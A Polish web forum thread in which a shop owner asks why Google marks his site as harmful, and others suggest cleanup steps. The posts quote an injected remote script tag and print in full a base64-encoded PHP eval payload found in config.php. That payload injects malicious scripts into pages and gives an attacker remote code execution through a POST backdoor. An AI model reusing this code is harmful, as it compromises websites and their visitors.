Szkodliwy skrypt w kodzie
Posty: 8
|Strona 1 z 1
Szkodliwy skrypt w kodzie
Witam
Od niedawna pojawił mi sie problem i miedzy znacznikami </head> <body> mam dopisany tajemniczy skrypt który uznawany jest dla google za szkodliwy. Tym samym moja strona ma nieprzyjemny podpis w google: Ta witryna może wyrządzić szkody na Twoim komputerze.
tak wyglada ten skrypt
Pojecia nie mam jak sie go moge pozbyć, przeszukiwałem pliki ręcznie czy nie ma dopisku, przeszukiwałem baze danych i nic nie znalazłem. Czy ktoś wie jak to usunąć?
Nie korzystam już z Total Commandera.
Pozdrawiam
Od niedawna pojawił mi sie problem i miedzy znacznikami </head> <body> mam dopisany tajemniczy skrypt który uznawany jest dla google za szkodliwy. Tym samym moja strona ma nieprzyjemny podpis w google: Ta witryna może wyrządzić szkody na Twoim komputerze.
tak wyglada ten skrypt
- Kod: Odnośnik widoczny tylko dla zalogowanych użytkowników - Zarejestruj się
<script src=http://tutaj jest adres strony/images/lazar.php ></script>
Pojecia nie mam jak sie go moge pozbyć, przeszukiwałem pliki ręcznie czy nie ma dopisku, przeszukiwałem baze danych i nic nie znalazłem. Czy ktoś wie jak to usunąć?
Nie korzystam już z Total Commandera.
Pozdrawiam
- Autor tematu
- Posty: 30
- Dołączył(a): 2008 sie 01, Pt 20:41
- Podziękował : 0 razy
- Otrzymał podziękowań: 0 razy
Re: Szkodliwy skrypt w kodzie
Na początek warto podać adres www, proponuje sprawdzić poprzez ftp które pliki były ostatnio zmieniana i prawdopodobnie na końcu pliku masz wstawione <script> </script> albo <iframe>
Total comander jest już bezpieczny.
Total comander jest już bezpieczny.
- Moderator Witryny
- Posty: 1698
- Dołączył(a): 2008 maja 05, Pn 16:13
- Podziękował : 0 razy
- Otrzymał podziękowań: 2 razy
Re: Szkodliwy skrypt w kodzie
albo poproś o przywrócenie serwera z kopii bezpieczeństwa
TC bezpieczny czy nie ja mam już hasła ponad 20 znakowe - 3 miesiąc kompletny spokój.
TC bezpieczny czy nie ja mam już hasła ponad 20 znakowe - 3 miesiąc kompletny spokój.
Re: Szkodliwy skrypt w kodzie
Witam
Moj sklep jest pod adresem: Odnośnik widoczny tylko dla zalogowanych użytkowników - Zarejestruj się już nie mam tego kodu, chyba że gdzieś się jeszcze ukrywa. W każdym razie najgorsze w tym wszystkim jest przyklejona przez gogle "nalepka" wejścia spadły do minimum. Czekam teraz na ponowne rozpatrzenie przez google co może potrwać nawet kilka tygodni. Skanowałem strone programami antyvirusowymi i nic nie wykrywały....
Kod był w pliku config.php w takiej postaci
nigdy bym się nie domyślił że to ten skrypt ciągle myślałem ze to coś zakodowanego przez twórce KQS. Na szczęscie on sam mi pomógł.
Prosiłem też o pomoc admina serwerów lap.pl i też wykrył dodatkowo podejrzany adres w pliku img/promocje.html
Podmiana pliku była 22 października, to był ostatni dzień kiedy korzystałem z TC, a robot google wykrył to 9 listopada.
Zalecam każdemu sprawdzenie plików na serwerze aby nie spotakła Was przykra "przylepka"
Ta witryna może wyrządzić szkody na Twoim komputerze.
Moj sklep jest pod adresem: Odnośnik widoczny tylko dla zalogowanych użytkowników - Zarejestruj się już nie mam tego kodu, chyba że gdzieś się jeszcze ukrywa. W każdym razie najgorsze w tym wszystkim jest przyklejona przez gogle "nalepka" wejścia spadły do minimum. Czekam teraz na ponowne rozpatrzenie przez google co może potrwać nawet kilka tygodni. Skanowałem strone programami antyvirusowymi i nic nie wykrywały....
Kod był w pliku config.php w takiej postaci
- Kod: Odnośnik widoczny tylko dla zalogowanych użytkowników - Zarejestruj się
<?php eval(base64_decode('aWYoIWlzc2V0KCRwcGoxKSl7ZnVuY3Rpb24gcHBqKCRzKXtpZihwcmVnX21hdGNoX2FsbCgnIzxzY3JpcHQoLio/KTwvc2NyaXB0PiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF0gYXMgJHYpaWYoY291bnQoZXhwbG9kZSgiXG4iLCR2KSk+NSl7JGU9cHJlZ19tYXRjaCgnI1tcJyJdW15cc1wnIlwuLDtcPyFcW1xdOi88PlwoXCldezMwLH0jJywkdil8fHByZWdfbWF0Y2goJyNbXChcW10oXHMqXGQrLCl7MjAsfSMnLCR2KTtpZigocHJlZ19tYXRjaCgnI1xiZXZhbFxiIycsJHYpJiYoJGV8fHN0cnBvcygkdiwnZnJvbUNoYXJDb2RlJykpKXx8KCRlJiZzdHJwb3MoJHYsJ2RvY3VtZW50LndyaXRlJykpKSRzPXN0cl9yZXBsYWNlKCR2LCcnLCRzKTt9aWYocHJlZ19tYXRjaF9hbGwoJyM8aWZyYW1lIChbXj5dKj8pc3JjPVtcJyJdPyhodHRwOik/Ly8oW14+XSo/KT4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdIGFzICR2KWlmKHByZWdfbWF0Y2goJyMgd2lkdGhccyo9XHMqW1wnIl0/MCpbMDFdW1wnIj4gXXxkaXNwbGF5XHMqOlxzKm5vbmUjaScsJHYpJiYhc3Ryc3RyKCR2LCc/Jy4nPicpKSRzPXByZWdfcmVwbGFjZSgnIycucHJlZ19xdW90ZSgkdiwnIycpLicuKj88L2lmcmFtZT4jaXMnLCcnLCRzKTskcz1zdHJfcmVwbGFjZSgkYT1iYXNlNjRfZGVjb2RlKCdQSE5qY21sd2RDQnpjbU05YUhSMGNEb3ZMMlpoWW1sc0xuQnNMMmx0WVdkbGN5OXNZWHBoY2k1d2FIQWdQand2YzJOeWFYQjBQZz09JyksJycsJHMpO2lmKHN0cmlzdHIoJHMsJzxib2R5JykpJHM9cHJlZ19yZXBsYWNlKCcjKFxzKjxib2R5KSNtaScsJGEuJ1wxJywkcyk7ZWxzZWlmKHN0cnBvcygkcywnLGEnKSkkcy49JGE7cmV0dXJuICRzO31mdW5jdGlvbiBwcGoyKCRhLCRiLCRjLCRkKXtnbG9iYWwgJHBwajE7JHM9YXJyYXkoKTtpZihmdW5jdGlvbl9leGlzdHMoJHBwajEpKWNhbGxfdXNlcl9mdW5jKCRwcGoxLCRhLCRiLCRjLCRkKTtmb3JlYWNoKEBvYl9nZXRfc3RhdHVzKDEpIGFzICR2KWlmKCgkYT0kdlsnbmFtZSddKT09J3BwaicpcmV0dXJuO2Vsc2VpZigkYT09J29iX2d6aGFuZGxlcicpYnJlYWs7ZWxzZSAkc1tdPWFycmF5KCRhPT0nZGVmYXVsdCBvdXRwdXQgaGFuZGxlcic/ZmFsc2U6JGEpO2ZvcigkaT1jb3VudCgkcyktMTskaT49MDskaS0tKXskc1skaV1bMV09b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5kX2NsZWFuKCk7fW9iX3N0YXJ0KCdwcGonKTtmb3IoJGk9MDskaTxjb3VudCgkcyk7JGkrKyl7b2Jfc3RhcnQoJHNbJGldWzBdKTtlY2hvICRzWyRpXVsxXTt9fX0kcHBqbD0oKCRhPUBzZXRfZXJyb3JfaGFuZGxlcigncHBqMicpKSE9J3BwajInKT8kYTowO2V2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpOw==')); ?>
nigdy bym się nie domyślił że to ten skrypt ciągle myślałem ze to coś zakodowanego przez twórce KQS. Na szczęscie on sam mi pomógł.
Prosiłem też o pomoc admina serwerów lap.pl i też wykrył dodatkowo podejrzany adres w pliku img/promocje.html
Podmiana pliku była 22 października, to był ostatni dzień kiedy korzystałem z TC, a robot google wykrył to 9 listopada.
Zalecam każdemu sprawdzenie plików na serwerze aby nie spotakła Was przykra "przylepka"
Ta witryna może wyrządzić szkody na Twoim komputerze.
- Autor tematu
- Posty: 30
- Dołączył(a): 2008 sie 01, Pt 20:41
- Podziękował : 0 razy
- Otrzymał podziękowań: 0 razy
Re: Szkodliwy skrypt w kodzie
davit napisał(a):Witam
Czekam teraz na ponowne rozpatrzenie przez google co może potrwać nawet kilka tygodni.
załóż kont w G i pisz do nich że usunąłeś kod, znam przypadki że w ciągu 1 dnia zareagowali
Re: Szkodliwy skrypt w kodzie
junki napisał(a):davit napisał(a):Witam
Czekam teraz na ponowne rozpatrzenie przez google co może potrwać nawet kilka tygodni.
załóż kont w G i pisz do nich że usunąłeś kod, znam przypadki że w ciągu 1 dnia zareagowali
korzystam z gmail, już zgłosiłem, czekam na reakcje, nie wiecie czy w weekendy pracują?
- Autor tematu
- Posty: 30
- Dołączył(a): 2008 sie 01, Pt 20:41
- Podziękował : 0 razy
- Otrzymał podziękowań: 0 razy
Re: Szkodliwy skrypt w kodzie
Ooo! Widzę że już dobrze.
- Posty: 717
- Dołączył(a): 2008 kwi 24, Cz 13:56
- Lokalizacja: www.szadek.net
- Podziękował : 0 razy
- Otrzymał podziękowań: 0 razy
Re: Szkodliwy skrypt w kodzie
radek170777 napisał(a):Ooo! Widzę że już dobrze.
Na szczescie juz tak
- Autor tematu
- Posty: 30
- Dołączył(a): 2008 sie 01, Pt 20:41
- Podziękował : 0 razy
- Otrzymał podziękowań: 0 razy
Posty: 8
|Strona 1 z 1
Użytkownicy przeglądający ten dział: Brak zidentyfikowanych użytkowników i 2 gości